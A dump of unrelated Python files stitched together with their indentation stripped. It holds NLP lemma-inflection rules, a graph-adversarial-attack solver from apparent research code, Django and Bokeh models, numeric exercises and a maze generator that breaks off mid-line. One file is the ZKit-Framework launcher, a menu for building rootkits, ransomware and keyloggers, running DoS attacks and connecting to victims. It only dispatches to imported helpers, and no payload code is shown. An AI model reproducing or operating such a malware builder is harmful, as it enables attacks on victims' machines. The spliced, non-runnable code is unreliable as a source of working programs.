                # count as correct if the unmapped lemma word equals the corresponding surface word
if token[0].text == token[1].text:
count_accu += 1
lemm_pre = token[0].text
pred_sent_text = ' '.join(pred_sent)
# pred_sent_text=pred_sent_text.rstrip()
bigramms_pred_sents.append(pred_sent_text)
if k <= 30:
print('-- NO.', k)
print(test_lemm_tacy_sents[k].text)
print(test_surf_tacy_sents[k].text)
print(pred_sent_text)
# %%
'''
Compute the accuracy of the bigram model:
'''
raw_acc_count, raw_count_total = count_accuracy_raw(test_lemm_corpus, test_surf_corpus)
print('Accuracy raw on test data:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
test_surf_tacy_sents_raw = [sent.text for sent in test_surf_tacy_sents]
from metric import *
taux_accu = accuracy(test_surf_tacy_sents_raw, bigramms_pred_sents)
print('Accuracy of the bigram predictor on test data:', count_accu, '/', len(test_surf_tacy_doc), '=', taux_accu)
end_time = time.time()
print('The bigram model took a total of %.3f minutes for training and prediction.' % ((end_time - start_time) / 60))
# %%
'''
# Part-of-speech tagging
'''
# alternative for parse:nlp = spacy.load('en', disable=['parser', 'tagger']),tagger = Tagger(nlp.vocab)
nlp2 = spacy.load('en')
start_time = time.time()
parse_pred_sents = []
for i, sent in enumerate(bigramms_pred_sents):
parsed_sent = nlp2(sent)
parse_pred_sent = []
rule1 = False
rule2 = False
rule3 = False
rule4 = False
rule42 = False
rule43 = False
for j, token in enumerate(parsed_sent):
if token.dep_ == 'nsubj' and token.tag_ == 'NN': # noun, singular or mass
rule1 = True
if token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl':
rule2 = True
# this rule is not so good:
# if token.pos_=='NUM':
# rule3=True
if token.dep_ == 'pobj' and token.tag_ == 'CD' and len(token.text) == 4: # 1990
rule4 = True
if rule4 and token.dep_ == 'nsubj' and token.tag_ == 'NN':
rule42 = True
rule4 = False
if rule4 and (token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl'):
rule43 = True
rule4 = False
if rule1 and token.pos_ == 'VERB':
rule1 = False
if token.text == 'be':
parse_pred_sent.append('is')
continue
if token.text == 'have':
parse_pred_sent.append('has')
continue
if token.text == token.lemma_:
parse_pred_sent.append(token.text + 's')
continue
if rule2 and token.pos_ == 'VERB':
rule2 = False
if token.text == 'be':
parse_pred_sent.append('are')
continue
if token.text == 'has':
parse_pred_sent.append('have')
continue
if rule3 and token.tag_ == 'NN':
rule3 = False
if token.text == token.lemma_:
parse_pred_sent.append(token.text + 's')
continue
if rule42 and token.pos_ == 'VERB':
rule42 = False
if token.text in ['be', 'is']:
parse_pred_sent.append('was')
continue
# this rule is not so good:
# if token.text==token.lemma_ and token.text.endswith('e'):
# parse_pred_sent.append(token.text+'d')
# # print(' '.join(parse_pred_sent))
# continue
if rule43 and token.pos_ == 'VERB':
rule43 = False
if token.text in ['be', 'are']:
parse_pred_sent.append('were')
continue
# this rule is not so good:
# if token.text==token.lemma_ and token.text.endswith('e'):
# parse_pred_sent.append(token.text+'d')
# # print(' '.join(parse_pred_sent))
# continue
parse_pred_sent.append(token.text)
parse_pred_sents.append(' '.join(parse_pred_sent))
taux_accu = accuracy(test_surf_tacy_sents_raw, parse_pred_sents)
print('Accuracy of the parse-based predictor on test data:', taux_accu)
end_time = time.time()
print('The parse-based predictor took a total of %.3f minutes for training and prediction.' % ((end_time - start_time) / 60))
# %%
# test code
# parse_pred_sent=[]
# parsed_sent=nlp2(bigramms_pred_sents[2371]) #772,123,2371
# rule1=False
# for j,token in enumerate( parsed_sent):
# print(token.text, token.pos_, token.tag_, token.dep_)
# if token.dep_=='nsubj' and token.tag_=='NN':
# rule1=True
# if rule1 and token.pos_=='VERB':
# rule1=False
# if token.text=='be':
# parse_pred_sent.append('is')
# continue
# if token.text=='have':
# parse_pred_sent.append('has')
# continue
# if token.text==token.lemma_:
# parse_pred_sent.append(token.text+'s')
# continue
# parse_pred_sent.append(token.text)
# print(' '.join(parse_pred_sent))
"ZKit-Framework Github : https://github.com/000Zer000/ZKit-Framework"
# Copyright (c) 2020, Zer0 . All rights reserved.
# This Work Is Licensed Under Apache Software License 2.0 More
# Can Be Found In The LICENSE File.
__author__ = "Zer0"
__version__ = "1.4.5"
__license__ = "Apache Software License 2.0"
__status__ = "Production"
import os
from datetime import datetime as dt
import sys
def start():
"Starts zkit with those beautiful menues"
try:
try:
# Doing some imports
from core.helper_core import notify, Color, Generate, dos, \
ctrler, helpbanner, init, print_banner, list_builtin_payloads, search_for_payloads, crash_handler
except (ImportError, ModuleNotFoundError) as value:
# Ops ! Sth is missing
print(
"One Or Some On Requirments Not Found . Please Install Them And Try Again ."
+ "Python Threw : "
+ str(value)
)
raise
# Printing A Banner More Coming Soon
_, red, green, yellow, blue, magenta, cyan, _, reset = Color().GetAllColors()
init()
print_banner()
# Hard And Boring Code
print(
"\t " * 5 + "Hacking is" + red + " C " + green + "O " + blue + "L " +
yellow + "O " + magenta + "R " + green +
"F " + red + "U " + magenta + "L " + reset
)
print(
"Available Options Are or Enter '?' To get a summery about notes of using this framework:\n"
+ red + " {1} --> Create A RootKit\n"
+ green + " {2} --> Create A Ransomware (Beta)\n"
+ blue + " {3} --> Create A KeyLogger \n"
+ yellow + " {4} --> Run A Dos Attack\n"
+ magenta + " {5} --> Connect To A Victim\n"
+ red + " {6} --> Generate Your User Payloads\n"
+ cyan + " {000}" + "--> Exit ZKit-Framework\n" + reset
)
while True:
try:
choice = str(input("..> "))
if choice == "000":
break
if choice == "?":
print(helpbanner)
elif choice == "1":
payloads = list_builtin_payloads('rootkit')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice == "2":
print(
"This Feature (Ransomware) is beta and have not tested . continue anyway ? (Y/N) : ", end="")
agreed = True if str(
input("")).lower().strip() == "y" else False
if agreed:
payloads = list_builtin_payloads('ransomware')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
else:
print("Ignoring . Back To Main Menu.")
elif choice == "3":
payloads = list_builtin_payloads('keylogger')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice == "4":
dos.main()
elif choice == "5":
ctrler.Main()
elif choice == "6":
                    payloads = search_for_payloads()  # assumption: the imported search_for_payloads helper is what was intended (list_payloads is not defined or imported)
if len(payloads) == 0:
print(
"No User Payload Was Found . Please Download one from zkit-market or make one using zkit-payload-template")
else:
print("Please Choose One Of Them (Number Of It): ", end="")
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice is not None:
notify(
"problem", "Invalid Input {" + "{}".format(choice) + "}")
except (KeyboardInterrupt, EOFError):
print("\nPlease Type '000' To Exit ZKit-Framework\n")
choice = None
except BaseException as e:
crash_handler(e)
start()
# Find the top k largest distinct values (originally an insertion/bubble sort exercise)
import time
# we have a data set starting with the very basic happy path to complex
data = {
"data1" : [5,4,1,3,2], # happy path easy to vizualize
"data2" : [5,4,1999,3,2,8,7,6,10,100], #larger range of values
"data3" : [5,4,1,3,2,2], # repeated values
"data4" : [1,1,1,1,1,1], # every element is the same
"data5" : [0,22,100,1,2,3,4,5,6,7,7,8,89,9,0,-1], #negative + zero
"data6" : [5,4,3,2,1], #reverse sorted array
"data7" : [1], # data with only 1 value
"data8" : [], # data with NULL value
"data9" : [4,2,1,6,2,10,4,3,10,6,5,6,7,2,10,10,4,6,5,8],
}
#-----------------------------------------------------------------------------#
# TOP-K SELECTION (an insertion-sort style attempt is left commented out below)
#-----------------------------------------------------------------------------#
def top_k(arr, k):
result = []
# for left_ptr in range(len(arr)-1):
# # result_dict[arr[left_ptr]] = 1
# curr_ptr = left_ptr + 1
# # go backwards in the array
# for curr_ptr in range(curr_ptr,0,-1):
# # if arr[curr_ptr] > arr[curr_ptr - 1] and arr[curr_ptr] not in arr[:curr_ptr]:
# if arr[curr_ptr] > arr[curr_ptr - 1]:
# arr[curr_ptr], arr[curr_ptr - 1] = arr[curr_ptr - 1], arr[curr_ptr]
arr.sort(reverse = True)
ptr = 0
while len(result) < k and ptr < len(arr):
if(ptr == 0 or arr[ptr] != arr[ptr-1]):
result.append(arr[ptr])
ptr += 1
return result
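# Examples (illustrative): top_k([5, 4, 1, 3, 2, 2], 3) -> [5, 4, 3]
# and top_k([1, 1, 1, 1, 1, 1], 3) -> [1], since duplicate values are skipped.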
if __name__ == "__main__":
    # Run top_k on each dataset and time it
k = 4
for i in range(len(data)):
start_time = time.time()
print(top_k(data["data"+str(i+1)],k))
print("Insertion time for data" + str(i+1) + " = "+ str(time.time() - start_time)) | python |
import numpy as np
import time
from numba import njit, prange
def exact_solver_wrapper(A_org, Q, p, L, delta_l, delta_g, constr='1'):
"""
Exact attacks for A^1, A^2 or A^{1+2}
param:
A_org: original adjacency matrix
Q: matrix, Q_i = Q[i]
p: vector
L: matrix, L_i = L[i]
delta_l: row budgets. If it is a scalar, expand to list with same value
delta_g: global budgets
constr: '1' (local budget solver) or '1+2' (local+global budget solver) or '2'
return:
unpert_val: function value under A_org (if constr='1', this is a vector)
opt_val: function value under A_pert (if constr='1', this is a vector)
A_pert: optimal attacking adjacency matrix
"""
if constr == '1':
# Exact attacks for A^1
return local_budget_solver(A_org, Q, p, L, delta_l, delta_g)
elif constr == '1+2':
# Exact attacks for A^{1+2}
return dp_solver(A_org, Q, p, L, delta_l, delta_g)
elif constr == '2':
# Exact attacks for A^2
        raise NotImplementedError('Exact attacks for A^2 are not implemented!')
@njit("(float64[:, :], float64[:, :], float64[:], float64[:, :], int64)", parallel=False, fastmath=True, cache=True)
# # @njit(parallel=True, fastmath=True)
# # @njit
def local_budget_precompute(A_org, Q, p, L, delta_l):
"""
    solver of equations 8 & 11 of the paper when the activation is the identity, the loss is max-margin, and pooling is average pooling
"""
nG = A_org.shape[0]
a = np.zeros((nG+1, delta_l+1)) # matrix a for described in equation 6
add_edge_matrix = np.zeros((nG+1, delta_l+1))
for i in range(1, nG+1): # looping each row of A
A_i = A_org[i-1,:]
A_i_edges = int(np.sum(A_i))
Q_i = Q[i-1]
L_i = L[i-1]
max_edges = min(A_i_edges + delta_l + 1, nG)
min_edges = max(A_i_edges - delta_l + 1, 1)
possible_denomi = max_edges - min_edges + 1
chunk_edges_mtx, chunk_no_edges_mtx = np.zeros((possible_denomi,delta_l+1)), np.zeros((possible_denomi,delta_l+1))
for x in range(min_edges, max_edges+1): # looping all possible (1'A_i + 1)
V_L = Q_i + L_i*x
indices = np.argsort(V_L)
chunk_edges, chunk_no_edges = [0.0]*(delta_l+1), [0.0]*(delta_l+1)
temp_idx = 1
for y in indices:
if temp_idx > delta_l: break
if y == i-1: continue # excluding self edge
if A_i[y] == 0:
chunk_no_edges[temp_idx] = V_L[y] + chunk_no_edges[temp_idx-1]
temp_idx += 1
temp_idx = 1
for y in indices[::-1]:
if temp_idx > delta_l: break
if y == i-1: continue # excluding self edge
if A_i[y] == 1:
chunk_edges[temp_idx] = V_L[y] + chunk_edges[temp_idx-1]
temp_idx += 1
chunk_edges_mtx[x - min_edges] = chunk_edges
chunk_no_edges_mtx[x - min_edges] = chunk_no_edges
A_V_i = np.dot(A_i, Q_i) + Q_i[i-1] + p[i-1]
A_L_i = np.dot(A_i, L_i)
a[i,0] = A_V_i/(A_i_edges+1) + A_L_i
for j in range(1,delta_l+1): # looping each possible local constraint
min_f = np.inf
for k in range(j+1): # looping different combinations of adding/removing
add_edges, remove_edges = k, j-k
if A_i_edges+add_edges > nG-1 or A_i_edges-remove_edges < 0:
continue
new_edges = A_i_edges+add_edges-remove_edges + 1
f = A_V_i + A_L_i*new_edges
# adding k edges from chunk of A_i=0 in ascent order
if add_edges > 0:
# print(chunk_no_edges_mtx[new_edges][add_edges])
f += chunk_no_edges_mtx[new_edges - min_edges][add_edges]
# removing j-k edges from chunk of A_i=1 in descent order
if remove_edges > 0:
# print(chunk_edges_mtx[new_edges][remove_edges])
f -= chunk_edges_mtx[new_edges - min_edges][remove_edges]
final_f = f/new_edges
if final_f < min_f:
min_f = final_f
sol = (min_f, add_edges)
a[i,j], add_edge_matrix[i,j] = sol
return a, add_edge_matrix
@njit("(float64[:], float64[:], float64[:], int64, int64, int64)", cache=True)
def get_A_opt(Q_i, A_i, L_i, i, j, add_edges):
A_i_edges = np.sum(A_i)
remove_edges = j - add_edges
new_edges = A_i_edges+add_edges-remove_edges + 1
V_L = Q_i + L_i.T*new_edges
indices = np.argsort(V_L)
A_new_i = A_i.copy()
added_edges = 0
for y in indices:
if added_edges == add_edges: break
if y == i-1: continue # excluding self edge
if A_i[y] == 0:
A_new_i[y] = 1
added_edges += 1
removed_edges = 0
for y in indices[::-1]:
if removed_edges == remove_edges: break
if y == i-1: continue # excluding self edge
if A_i[y] == 1:
A_new_i[y] = 0
removed_edges += 1
return A_new_i
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def dp_solver(A_org, Q, p, L, delta_l, delta_g):
"""
    DP for solving min_{A in A_G^{1+2}} \sum_i [((A_i + e_i)@Q_i + p_i)/(1'A_i + 1) + A_i@L_i]
Algorithm 1:
1. Precomputing matrix a
2. DP to get matrix s
3. Tracing back
Complexity: nG^2*delta_l*log(nG) + nG*delta_l^2 + nG^2*delta_l^2
param:
A_org: original adjacency matrix
Q: matrix, Q_i = Q[i]
p: vector
L: matrix, L_i = L[i]
delta_l: row budgets
delta_g: global budgets
"""
# start = time.time()
max_delta_l = max(delta_l)
a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
# print(f'Precomputation of matrix a: {time.time() - start}')
# ---------------------FIRST LOOP---------------------
nG = A_org.shape[0]
c = [0]*(nG+1)
for t in range(1, nG+1):
c[t] = min(c[t-1]+delta_l[t-1], delta_g)
s = [np.array([0.0]*(i+1)) for i in c]
# s = np.zeros((nG+1, min(nG*np.max(delta_l), delta_g)+1))
for t in range(1, nG+1):
st_1, st, at = s[t-1], s[t], a[t]
for j in range(0,c[t]+1):
m = np.inf
for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
m = min(st_1[j-k]+at[k], m) # accessing s seems costly
st[j] = m
# ---------------------SECOND LOOP---------------------
A_pert = np.zeros((nG,nG))
j = np.argmin(s[nG]) # this sort takes nG*delta_l log(nG*delta_l)
opt_val = s[nG][j]
unpert_val = s[nG][0]
for t in range(nG,0,-1):
temp = np.ones(delta_l[t-1]+1)*np.inf
st_1, at = s[t-1], a[t]
for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
temp[k] = st_1[j-k] + at[k]
kt = np.argmin(temp)
j = j - kt
A_pert[t-1,:] = get_A_opt(Q[t-1], A_org[t-1], L[t-1], \
t, kt, add_edge_matrix[t][kt])
sol = (unpert_val, opt_val, A_pert)
return sol
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def local_budget_solver(A_org, Q, p, L, delta_l, delta_g):
max_delta_l = max(delta_l)
a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
nG = A_org.shape[0]
A_pert = np.zeros((nG,nG))
opt_fvals = np.zeros(nG)
for i in range(nG):
delta_l_i = delta_l[i]
best_delta_l = np.argmin(a[i+1][0:(delta_l_i+1)])
A_pert[i] = get_A_opt(Q[i], A_org[i], L[i], i+1, best_delta_l, \
add_edge_matrix[i+1][best_delta_l])
opt_fvals[i] = a[i+1][best_delta_l]
sol = (a[:, 0], opt_fvals, A_pert)
return sol
def po_dp_solver(A_org, R, delta_l, delta_g):
nG = A_org.shape[0]
# precomputing a matrix
J = R*(-2*A_org + 1)
a = po_local_solver(J, nG, delta_l)
A_pert = np.zeros((nG,nG))
V_pert = np.zeros((nG,nG))
c, s = first_loop(a, delta_l, delta_g)
j = np.argmin(s[nG])
unpert_val = s[nG][0]
opt_val = s[nG][j]
for t in range(nG,0,-1):
temp = np.ones(delta_l+1)*np.inf
st_1, at = s[t-1], a[t]
for k in range(max(0, j-c[t-1]), min(j, delta_l)+1):
temp[k] = st_1[j-k] + at[k]
kt = np.argmin(temp)
j = j - kt
V_pert[t-1,:] = optVt_from_a_tj(J[t-1, :], t, kt, delta_l)
A_pert[t-1,:] = ((2*A_org[t-1, :] - 1)*(-2*V_pert[t-1,:]+1)+1)/2
return A_pert
def po_local_solver(J, nG, delta_l):
a = np.zeros((nG+1, delta_l+1))
for i in range(1, nG+1): # looping each row of A
J_i = J[i-1, :].copy()
J_i = -np.delete(J_i, i-1)
indices = np.argsort(J_i)
for j in range(1,delta_l+1): # looping each possible local constraints
a[i,j] = J_i[indices[j-1]] + a[i,j-1]
return a
def optVt_from_a_tj(J_t, t, j, delta_l):
V = np.zeros(J_t.shape)
indices = np.argsort(-J_t)
changed_edges = 0
for i in range(j+1):
if indices[i] == t-1: continue
V[indices[i]] = 1
changed_edges += 1
if changed_edges >= j: break
return V
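# Minimal smoke test (an illustrative sketch, not part of the original module): it builds
# a small random symmetric 0/1 adjacency matrix and random Q, p, L with the dtypes the
# @njit signatures above expect (float64 matrices/vectors, int64 row budgets), then runs
# the exact local+global budget attack through the wrapper.
if __name__ == '__main__':
    np.random.seed(0)
    n = 6
    A_org = (np.random.rand(n, n) < 0.3).astype(np.float64)
    A_org = np.maximum(A_org, A_org.T)       # make the graph symmetric
    np.fill_diagonal(A_org, 0.0)             # no self loops
    Q = np.random.randn(n, n)
    p = np.random.randn(n)
    L = np.random.randn(n, n)
    delta_l = np.full(n, 2, dtype=np.int64)  # per-row edge budget
    delta_g = 4                              # global edge budget
    unpert_val, opt_val, A_pert = exact_solver_wrapper(A_org, Q, p, L, delta_l, delta_g,
                                                       constr='1+2')
    print('objective before attack:', unpert_val)
    print('objective after attack :', opt_val)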
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
# Create your models here.
class UserProfileManager(BaseUserManager):
"""Manager for User Profile Model"""
def create_user(self, email, name, mobile_no, password=None, is_supervisor=False, is_gaurd=False):
"""Create new user profile"""
if not email:
raise ValueError("User must have email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name,mobile_no=mobile_no,is_supervisor=is_supervisor,is_gaurd=is_gaurd)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, mobile_no, password):
"""Create and Save New SuperUser with given Details"""
user = self.create_user(email, name, mobile_no, password)
user.is_superuser = True
user.is_staff = True
user.is_supervisor = True
user.is_gaurd = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser, PermissionsMixin):
"""Database model for users in the System"""
id = models.AutoField(primary_key=True)
email = models.EmailField(max_length=255,unique=True)
name = models.CharField(max_length=255)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
mobile_no = models.CharField(max_length=12)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
is_supervisor = models.BooleanField(default=False)
is_gaurd = models.BooleanField(default=False)
is_demo_account = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name','mobile_no']
def get_full_name(self):
"""Retrieve Full Name of User"""
return self.first_name+' '+self.last_name
def get_short_name(self):
"""Retrieve Short Name of User"""
return self.name
def get_contact_details(self):
"""Retrieve Contact Details of the User"""
return 'Email ID: {} Mobile No: {}'.format(self.email, self.mobile_no)
def __str__(self):
"""Return Representation of User"""
return self.email
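# Example usage (a sketch, e.g. from a Django shell or a test; the field values are illustrative):
#   user = UserProfile.objects.create_user(
#       email='[email protected]', name='Jane', mobile_no='9999999999', password='secret')
#   user.get_short_name()       # -> 'Jane'
#   user.get_contact_details()  # -> 'Email ID: [email protected] Mobile No: 9999999999'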
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from unittest import TestCase
import os
from auxlib.packaging import get_version
# from auxlib.packaging import (_get_version_from_pkg_info, _is_git_dirty, _get_most_recent_git_tag,
# _get_git_hash, is_git_repo)
# from auxlib.path import ROOT_PATH
# class TestPackaging(TestCase):
#
# def test_version_string(self):
# try:
# test_version = str(random.randint(0,1e6))
# with open('.version', 'w') as f:
# f.write(test_version)
# assert _get_version_from_pkg_info('tests') == test_version
# finally:
# if os.path.exists('.version'):
# os.remove('.version')
#
# def test_is_git_dirty(self):
# result = _is_git_dirty(os.getcwd())
# assert result is True or result is False
#
#
# def test_get_git_hash(self):
# hash = _get_git_hash(os.getcwd())
# assert len(hash) == 7
#
# def test_not_git_repo(self):
# assert not is_git_repo(ROOT_PATH)
class TestPackagingNotGitRepo(TestCase):
def setUp(self):
super(TestPackagingNotGitRepo, self).setUp()
self.cwd = os.getcwd()
os.chdir('/')
def tearDown(self):
super(TestPackagingNotGitRepo, self).tearDown()
os.chdir(self.cwd)
def test_get_most_recent_git_tag_no_repo(self):
tag = get_version(os.getcwd())
assert tag is None
from rest_framework import serializers
from daily_tracker.models import Attandance
class AttandanceSerializer(serializers.HyperlinkedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='api:attandance-detail')
class Meta:
model = Attandance
fields = ('id', 'enter_at', 'out_at', 'total_time', 'url')
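# Note (sketch): the HyperlinkedIdentityField above assumes a route registered under the
# name 'api:attandance-detail' (e.g. via a DRF router included with the 'api' namespace),
# and, like all hyperlinked fields, it needs the current request in the serializer context
# in order to build absolute URLs.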
import numpy as num
from decimal import *
import scipy as sci
from numpy.polynomial import polynomial as pol
def euler(f,a,b,n ,y_0):
h=Decimal((b-a))/Decimal(n)
vals = []
vals.append(y_0)
print ("Indice\t | t | Aproximado(u) ")
print("0\t | 0 |\t"+str(y_0))
for i in range (0, n-1):
tj =Decimal(a+(i)*h)
x = vals[i] + h*f(tj,Decimal(vals[i]))
vals.append(x)
print(str(i+1)+"\t | "+str(tj)+" |"+"\t"+str(x))
"""print("u_",i+1,"=",x)"""
def f(t,x):
return -x + t + 1
f0 = 1
euler(f,0,1,10,f0)
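# For this IVP (u' = -u + t + 1, u(0) = 1) the exact solution is u(t) = t + exp(-t);
# comparing the printed approximations against it is a quick sanity check
# (note added for illustration, not part of the original script).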
from __future__ import absolute_import
import inspect
from textwrap import dedent
from types import FunctionType
from ..core.properties import Bool, Dict, Either, Int, Seq, String, AnyRef
from ..model import Model
from ..util.dependencies import import_required
from ..util.compiler import nodejs_compile, CompilationError
class Filter(Model):
''' A Filter model represents a filtering operation that returns a row-wise subset of
data when applied to a ColumnDataSource.
'''
filter = Either(Seq(Int), Seq(Bool), help="""
A list that can be either integer indices or booleans representing a row-wise subset of data.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "filter" not in kw:
kw["filter"] = args[0]
super(Filter, self).__init__(**kw)
class IndexFilter(Filter):
''' An IndexFilter filters data by returning the subset of data at a given set of indices.
'''
indices = Seq(Int, help="""
A list of integer indices representing the subset of data to select.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "indices" not in kw:
kw["indices"] = args[0]
super(IndexFilter, self).__init__(**kw)
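# Example (sketch): an IndexFilter is normally applied through a CDSView, e.g.
#
#     view = CDSView(source=source, filters=[IndexFilter([0, 2, 4])])
#     plot.circle(x='x', y='y', source=source, view=view)
#
# (``CDSView`` lives in ``bokeh.models``; shown here for illustration only.)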
class BooleanFilter(Filter):
''' A BooleanFilter filters data by returning the subset of data corresponding to indices
where the values of the booleans array is True.
'''
booleans = Seq(Bool, help="""
A list of booleans indicating which rows of data to select.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "booleans" not in kw:
kw["booleans"] = args[0]
super(BooleanFilter, self).__init__(**kw)
class GroupFilter(Filter):
''' A GroupFilter represents the rows of a ColumnDataSource where the values of the categorical
column column_name match the group variable.
'''
column_name = String(help="""
The name of the column to perform the group filtering operation on.
""")
group = String(help="""
The value of the column indicating the rows of data to keep.
""")
def __init__(self, *args, **kw):
if len(args) == 2 and "column_name" not in kw and "group" not in kw:
kw["column_name"] = args[0]
kw["group"] = args[1]
super(GroupFilter, self).__init__(**kw)
class CustomJSFilter(Filter):
''' Filter data sources with a custom defined JavaScript function.
.. warning::
The explicit purpose of this Bokeh Model is to embed *raw JavaScript
code* for a browser to execute. If any part of the code is derived
from untrusted user inputs, then you must take appropriate care to
sanitize the user input prior to passing to Bokeh.
'''
@classmethod
def from_py_func(cls, func):
''' Create a CustomJSFilter instance from a Python function. The
        function is translated to JavaScript using PScript.
The ``func`` function namespace will contain the variable ``source``
at render time. This will be the data source associated with the CDSView
that this filter is added to.
'''
if not isinstance(func, FunctionType):
raise ValueError('CustomJSFilter.from_py_func only accepts function objects.')
pscript = import_required(
'pscript',
dedent("""\
To use Python functions for CustomJSFilter, you need PScript
'("conda install -c conda-forge pscript" or "pip install pscript")""")
)
argspec = inspect.getargspec(func)
default_names = argspec.args
default_values = argspec.defaults or []
if len(default_names) - len(default_values) != 0:
raise ValueError("Function may only contain keyword arguments.")
        # should the following require that all of the default values are Models?
if default_values and not any(isinstance(value, Model) for value in default_values):
raise ValueError("Default value must be a plot object.")
func_kwargs = dict(zip(default_names, default_values))
code = pscript.py2js(func, 'filter') + 'return filter(%s);\n' % ', '.join(default_names)
return cls(code=code, args=func_kwargs)
@classmethod
def from_coffeescript(cls, code, args={}):
''' Create a CustomJSFilter instance from CoffeeScript snippets.
The function bodies are translated to JavaScript functions using node
and therefore require return statements.
The ``code`` function namespace will contain the variable ``source``
at render time. This will be the data source associated with the CDSView
that this filter is added to.
'''
compiled = nodejs_compile(code, lang="coffeescript", file="???")
if "error" in compiled:
raise CompilationError(compiled.error)
else:
return cls(code=compiled.code, args=args)
args = Dict(String, AnyRef, help="""
A mapping of names to Python objects. In particular those can be bokeh's models.
These objects are made available to the callback's code snippet as the values of
named parameters to the callback.
""")
code = String(default="", help="""
A snippet of JavaScript code to filter data contained in a columnar data source.
The code is made into the body of a function, and all of of the named objects in
``args`` are available as parameters that the code can use. The variable
``source`` will contain the data source that is associated with the CDSView this
filter is added to.
The code should either return the indices of the subset or an array of booleans
to use to subset data source rows.
Example:
.. code-block:: javascript
code = '''
var indices = [];
            for (var i = 0; i < source.data['some_column'].length; i++){
if (source.data['some_column'][i] == 'some_value') {
indices.push(i)
}
}
return indices;
'''
.. note:: Use ``CustomJS.from_coffeescript()`` for CoffeeScript source code.
""")
use_strict = Bool(default=False, help="""
Enables or disables automatic insertion of ``"use strict";`` into ``code``.
""")
import random
import sys
def room(map, times, max, min):
# map
width = len(map)
height = len(map[0])
    # Store the generated rooms
rooms = []
for i in range(times):
sp = (random.randint(0, int((width-1)/2))*2+1,
random.randint(0, int((height-1)/2))*2+1)
length = random.randint(int(min/2), int(max/2))*2+1
room = (sp, length)
rooms.append(room)
# check if intersect
'''for r in rooms:
point = r[0]
l = r[1]
if sp[0]
'''
for r in rooms:
for i in range(r[0][0], r[0][0]+r[1]):
for j in range(r[0][1], r[0][1]+r[1]):
if 0 < i and i < width-1 and 0 < j and j < height-1:
map[i][j] = 4
return rooms
def open_door(map, rooms, door_ratio):
# map
width = len(map)
height = len(map[0])
for room in rooms:
# check each walls
isHasOneDoor = False
# top
for y in range(room[0][1], room[0][1]+room[1]):
x = room[0][0]-1
if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x-1 >= 0 and map[x-1][y] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# down
for y in range(room[0][1], room[0][1]+room[1]):
x = room[0][0]+room[1]+1
if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x+1 <= width-1 and map[x+1][y] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# left
for x in range(room[0][0], room[0][0]+room[1]):
y = room[0][0]-1
if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y-1 >= 0 and map[x][y-1] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# right
for x in range(room[0][0], room[0][0]+room[1]):
y = room[0][0]+room[1]+1
if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y+1 <= width-1 and map[x][y+1] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
def maze(height, width, rooms_count, room_max_length, room_min_length, door_ratio):
# 0 unvisited road
# 1 unvisited wall
# 2 visited road
# 3 visited wall
# 4 room district
# Generate maze map
map = [[1 for i in range(height)] for i in range(width)]
for i in range(1, width):
for j in range(1, height-1):
if j % 2 != 0 and i % 2 != 0:
map[i][j] = 0
    # randomly place some rooms
rooms = room(map, rooms_count, room_max_length, room_min_length)
    # pick a random start point
sp = (random.randint(0, width-1), random.randint(0, height-1))
while map[sp[0]][sp[1]] != 0:
sp = (random.randint(0, width-1), random.randint(0, height-1))
point_list = []
# Start
map[sp[0]][sp[1]] = 2
point_list.append((sp[0]-1, sp[1], sp))
point_list.append((sp[0], sp[1]-1, sp))
point_list.append((sp[0]+1, sp[1], sp))
point_list.append((sp[0], sp[1]+1, sp))
# Loop for generation
while len(point_list) > 0:
        # pick a random point from the list
point = point_list[random.randint(0, len(point_list)-1)]
        # check that the picked point lies inside the map
if not (0 <= point[0] and point[0] <= width-1 and 0 <= point[1] and point[1] <= height-1):
point_list.remove(point)
continue
# expand
road = point[2]
check_point = (point[0]-road[0]+point[0],
point[1]-road[1]+point[1])
if (0 <= check_point[0] and check_point[0] <= width-1 and 0 <= check_point[1] and check_point[1] <= height-1) and map[check_point[0]][check_point[1]] == 0:
map[check_point[0]][check_point[1]] = 2
map[point[0]][point[1]] = 2
# add around points of check_point
if check_point[0] >= 0 and map[check_point[0]-1][check_point[1]] == 1:
point_list.append(
(check_point[0]-1, check_point[1], check_point))
if check_point[0] <= width-1 and map[check_point[0]+1][check_point[1]] == 1:
point_list.append(
(check_point[0]+1, check_point[1], check_point))
if check_point[1] >= 0 and map[check_point[0]][check_point[1]-1] == 1:
